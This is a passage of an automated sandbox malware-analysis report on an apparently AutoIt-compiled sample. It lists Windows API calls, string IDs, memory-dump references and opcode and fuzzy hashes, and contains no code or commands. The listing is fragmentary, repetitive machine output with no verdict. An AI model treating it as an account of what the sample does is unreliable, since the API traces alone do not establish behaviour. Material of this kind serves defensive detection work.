                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 007257E0
                                                        • _wcslen.LIBCMT ref: 007257EC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper_wcslen
                                                        • String ID: CALLARGARRAY
                                                        • API String ID: 157775604-1150593374
                                                        • Opcode ID: e78b0c1275a06b28b32cdada61e6ea25d6d6c6b56fc03766f0f7f90210dc940b
                                                        • Instruction ID: 1ca4833f12977a7e57f3f1131e7467ff8c43b1360961df917bb079ba9e2b9047
                                                        • Opcode Fuzzy Hash: e78b0c1275a06b28b32cdada61e6ea25d6d6c6b56fc03766f0f7f90210dc940b
                                                        • Instruction Fuzzy Hash: F541AE71A00219DFCB04EFA8D8858BEBBF5FF59320F10412DE505AB291E7789D81CBA0
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 0071D130
                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0071D13A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CrackInternet_wcslen
                                                        • String ID: |
                                                        • API String ID: 596671847-2343686810
                                                        • Opcode ID: b081ea02184302a211d628678fecbb037cb01e53efa27388ee23cc059e99d891
                                                        • Instruction ID: d5d04fed221c9a48561f98829a212e64ff3283cf51d3883e79be08875709a305
                                                        • Opcode Fuzzy Hash: b081ea02184302a211d628678fecbb037cb01e53efa27388ee23cc059e99d891
                                                        • Instruction Fuzzy Hash: 89314C71D00219ABCF55EFA4CC85AEEBFBAFF05304F000019F915A6161EB35AA46DF64
                                                        APIs
                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00733621
                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0073365C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Window$DestroyMove
                                                        • String ID: static
                                                        • API String ID: 2139405536-2160076837
                                                        • Opcode ID: 72ac8f72751d4ba2bdf03acf71cf2c5ecc140561ba7fa36424d601e69bc398c0
                                                        • Instruction ID: e92b48c008ba8289c84592fb4b4fd11d28e21c16e2dce4cd9a2c3078971cc167
                                                        • Opcode Fuzzy Hash: 72ac8f72751d4ba2bdf03acf71cf2c5ecc140561ba7fa36424d601e69bc398c0
                                                        • Instruction Fuzzy Hash: 09318F71110204AEEB209F38DC41EFB73A9FF88720F00961DF8A5D7291DA39AD91C764
                                                        APIs
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0073461F
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00734634
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: '
                                                        • API String ID: 3850602802-1997036262
                                                        • Opcode ID: f7924947cd4043820ad57696475f9a79a8aaa65c02c5733c0a50822a31dbc231
                                                        • Instruction ID: bd5460d5464f1494abc2f3d9e8183eda24a51825f66d06cf66b74de01e418e8e
                                                        • Opcode Fuzzy Hash: f7924947cd4043820ad57696475f9a79a8aaa65c02c5733c0a50822a31dbc231
                                                        • Instruction Fuzzy Hash: 9C312775A01219DFEB18CFA9C981BDABBB5FF09300F10406AE904AB342D774A951CF90
                                                        APIs
                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 006E33A2
                                                          • Part of subcall function 006A6B57: _wcslen.LIBCMT ref: 006A6B6A
                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 006A3A04
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: IconLoadNotifyShell_String_wcslen
                                                        • String ID: Line:
                                                        • API String ID: 2289894680-1585850449
                                                        • Opcode ID: 11f13b0b19c74a0438f4e1eea13fff8d54af48422ea7d2bcd4fc361f441e3201
                                                        • Instruction ID: 9d85bd5a73601396813d2215ffab5430875e83b900dd91c9d49abf55c89b9706
                                                        • Opcode Fuzzy Hash: 11f13b0b19c74a0438f4e1eea13fff8d54af48422ea7d2bcd4fc361f441e3201
                                                        • Instruction Fuzzy Hash: 7D310471408360AEC761FB24DC46FEBB7D9AB41350F00452EF59983291EB749A49CBDA
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0073327C
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00733287
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: Combobox
                                                        • API String ID: 3850602802-2096851135
                                                        • Opcode ID: 80ff142f0180c3eadb1b048b1c4e0e4c49b356d9245d7093901fd99a9c210b6c
                                                        • Instruction ID: d656f0d648cca27ed5edef75a0d3f104a82580140acc889cdff4c24a0d6cd8b2
                                                        • Opcode Fuzzy Hash: 80ff142f0180c3eadb1b048b1c4e0e4c49b356d9245d7093901fd99a9c210b6c
                                                        • Instruction Fuzzy Hash: 1C11B271300208BFFF259E54DC85EBB376AFB943A4F104228F9189B292D6799D518B60
                                                        APIs
                                                          • Part of subcall function 006A600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006A604C
                                                          • Part of subcall function 006A600E: GetStockObject.GDI32(00000011), ref: 006A6060
                                                          • Part of subcall function 006A600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 006A606A
                                                        • GetWindowRect.USER32(00000000,?), ref: 0073377A
                                                        • GetSysColor.USER32(00000012), ref: 00733794
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                        • String ID: static
                                                        • API String ID: 1983116058-2160076837
                                                        • Opcode ID: 8938b27d672b622aba348ddfe525119fc029c81fd2b4a73af667b70d47a17637
                                                        • Instruction ID: 0f02cc29e91ff60009b56d32336371a543b1772bdf16210bbdef576eb218b406
                                                        • Opcode Fuzzy Hash: 8938b27d672b622aba348ddfe525119fc029c81fd2b4a73af667b70d47a17637
                                                        • Instruction Fuzzy Hash: 15113AB2610209AFEF11DFB8CC46EFA7BB8FB09354F004518F955E2251D739E8619B50
                                                        APIs
                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0071CD7D
                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0071CDA6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Internet$OpenOption
                                                        • String ID: <local>
                                                        • API String ID: 942729171-4266983199
                                                        • Opcode ID: d5611ccf024b875ea371f7560577cebe58250e06c1e20ac77f06badf47ddd419
                                                        • Instruction ID: d826f91e8164e0d40a33be94d004a9761df9b81b87a214f3b318d770ce0b24c9
                                                        • Opcode Fuzzy Hash: d5611ccf024b875ea371f7560577cebe58250e06c1e20ac77f06badf47ddd419
                                                        • Instruction Fuzzy Hash: 5F11C6B13856317AD7364BAA9C45EE7BE6CEF127A4F404226B589931C0D7789880D6F0
                                                        APIs
                                                        • GetWindowTextLengthW.USER32(00000000), ref: 007334AB
                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007334BA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: LengthMessageSendTextWindow
                                                        • String ID: edit
                                                        • API String ID: 2978978980-2167791130
                                                        • Opcode ID: 032a9317d87f32e094d2b996f7224adf73b5d45a32df801df8a9cd171a72b331
                                                        • Instruction ID: 6a4752b9bd628c76bc7483207769ade15b667a4e164ddd38758bb9721ce5fda9
                                                        • Opcode Fuzzy Hash: 032a9317d87f32e094d2b996f7224adf73b5d45a32df801df8a9cd171a72b331
                                                        • Instruction Fuzzy Hash: CE118C71100248ABFB228F64DC44ABB376AEB05374F508324F965A31E2C779EC919B64
                                                        APIs
                                                          • Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD
                                                        • CharUpperBuffW.USER32(?,?,?), ref: 00706CB6
                                                        • _wcslen.LIBCMT ref: 00706CC2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$BuffCharUpper
                                                        • String ID: STOP
                                                        • API String ID: 1256254125-2411985666
                                                        • Opcode ID: 7fdfe912587f236c62627953dfc725fefe5e014bf2b10dcca54082272902171b
                                                        • Instruction ID: d62c44138015cb7e813d5ad0481e7fe3c7554d8ff28cbfadafe9fa1f0b3bb63d
                                                        • Opcode Fuzzy Hash: 7fdfe912587f236c62627953dfc725fefe5e014bf2b10dcca54082272902171b
                                                        • Instruction Fuzzy Hash: 8A010432600526CBDB20AFBDDCA09BF37F5EA617107100629E852D61D0EB39EC20C660
                                                        APIs
                                                          • Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD
                                                          • Part of subcall function 00703CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00703CCA
                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00701C46
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_wcslen
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 624084870-1403004172
                                                        • Opcode ID: d294892f81f5a38de2a27d4562fa79c088066476d2ee0eaa268ca9da7de566f8
                                                        • Instruction ID: bc815129f9de1db41dea1faa9e7e9bd2fd416a79f76ed1abbb6fba9998c3d6e4
                                                        • Opcode Fuzzy Hash: d294892f81f5a38de2a27d4562fa79c088066476d2ee0eaa268ca9da7de566f8
                                                        • Instruction Fuzzy Hash: 5B01F7B1680104E7EB08FB90C962DFF73E89B12340F500519B816732C2EA28DE4887B5
                                                        APIs
                                                        • __Init_thread_footer.LIBCMT ref: 006BA529
                                                          • Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Init_thread_footer_wcslen
                                                        • String ID: ,%w$3yo
                                                        • API String ID: 2551934079-2742024474
                                                        • Opcode ID: fc54703227c2c0ebe72bd0839bccc9a957028deec153468e01d2f5970160da5a
                                                        • Instruction ID: ee4f5bd71e4da42e349e96b56d8315903e9719f36d3230e36a5bddc59dfe892b
                                                        • Opcode Fuzzy Hash: fc54703227c2c0ebe72bd0839bccc9a957028deec153468e01d2f5970160da5a
                                                        • Instruction Fuzzy Hash: 6D01F77270061497DA24F7A8D81BAED3397DB05750F50406CF516572C3DE149E828BAF
                                                        APIs
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00773018,0077305C), ref: 007381BF
                                                        • CloseHandle.KERNEL32 ref: 007381D1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateHandleProcess
                                                        • String ID: \0w
                                                        • API String ID: 3712363035-2344672426
                                                        • Opcode ID: 3ecd2480ee3a11ffef7800158cf322f60cf33ae3a8c269de393054e0365e5d58
                                                        • Instruction ID: 027307d08a05b4c24128c536850dd9d17de4fcefc19e8f939d3087dec99fabd6
                                                        • Opcode Fuzzy Hash: 3ecd2480ee3a11ffef7800158cf322f60cf33ae3a8c269de393054e0365e5d58
                                                        • Instruction Fuzzy Hash: 49F05EB2640304BAF6206761AC45FB73A5EDB05791F008425BB0CE51A2D67E8A50E3BD
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _wcslen
                                                        • String ID: 3, 3, 16, 1
                                                        • API String ID: 176396367-3042988571
                                                        • Opcode ID: 2dda1119b763f502f0c07759c560333b3ecbfe427bfc41b488aab71c0fd36c28
                                                        • Instruction ID: d548fcea76ba1f3d0126bc40bbcd8332caba2db2eae15de1e3a7daf8deebef6e
                                                        • Opcode Fuzzy Hash: 2dda1119b763f502f0c07759c560333b3ecbfe427bfc41b488aab71c0fd36c28
                                                        • Instruction Fuzzy Hash: 11E02B026042B0509279327ABDC1EBF578ACFC5790710182FF981C2266EEA88D91D3E4
                                                        APIs
                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00700B23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Message
                                                        • String ID: AutoIt$Error allocating memory.
                                                        • API String ID: 2030045667-4017498283
                                                        • Opcode ID: 674ab2bf5dedd2e37f82710f326fe3f10044ec15409984c3e77ca128b383d7bf
                                                        • Instruction ID: b27f989f0bb24b3be928530f97b0950274c1b1f0a970affeacad3dc852357371
                                                        • Opcode Fuzzy Hash: 674ab2bf5dedd2e37f82710f326fe3f10044ec15409984c3e77ca128b383d7bf
                                                        • Instruction Fuzzy Hash: B5E0D87124431836E25137547C03FD97A858F05B21F10042EFB58654D38AD6689047ED
                                                        APIs
                                                          • Part of subcall function 006BF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,006C0D71,?,?,?,006A100A), ref: 006BF7CE
                                                        • IsDebuggerPresent.KERNEL32(?,?,?,006A100A), ref: 006C0D75
                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,006A100A), ref: 006C0D84
                                                        Strings
                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 006C0D7F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                        • API String ID: 55579361-631824599
                                                        • Opcode ID: 61ea630513973bc695a938c57b4741989a33917d0fe915728c8d3f44468dbf3f
                                                        • Instruction ID: 8482a736767f329aea34eb69809c8853b1534e69e03d4064a3589a53ac118fc4
                                                        • Opcode Fuzzy Hash: 61ea630513973bc695a938c57b4741989a33917d0fe915728c8d3f44468dbf3f
                                                        • Instruction Fuzzy Hash: 05E06DB02003118BF3609FB8E8047527BE1FF00B81F00897DE886C6662DBB9F4848B91
                                                        APIs
                                                        • __Init_thread_footer.LIBCMT ref: 006BE3D5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Init_thread_footer
                                                        • String ID: 0%w$8%w
                                                        • API String ID: 1385522511-170289743
                                                        • Opcode ID: deaaf342442e618434945774ce0856d6156ca2e5cad19b217696c0e80c35b117
                                                        • Instruction ID: 07d72b40bd8fbb58b776ce04002d56d0c0df6be5624bb51b0cedc66a8bb86c4d
                                                        • Opcode Fuzzy Hash: deaaf342442e618434945774ce0856d6156ca2e5cad19b217696c0e80c35b117
                                                        • Instruction Fuzzy Hash: 67E02671448910CBCA049728B854ED83397EB04368B1091FCE12A872D3DB3D68C3874C
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: LocalTime
                                                        • String ID: %.3d$X64
                                                        • API String ID: 481472006-1077770165
                                                        • Opcode ID: a8048da66445e3dc6ea9895ddcb8617a5dc981f9568c7ab8f5c191ece59beab1
                                                        • Instruction ID: 5c94e97133705ebf4bc5e1842d1244b6981e0bca1c51310a0bb406a335778089
                                                        • Opcode Fuzzy Hash: a8048da66445e3dc6ea9895ddcb8617a5dc981f9568c7ab8f5c191ece59beab1
                                                        • Instruction Fuzzy Hash: BBD012E180810CE9CB9097D0CC458FAB37FBB08341F508452FB06A1040E628E64AA7A1
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0073236C
                                                        • PostMessageW.USER32(00000000), ref: 00732373
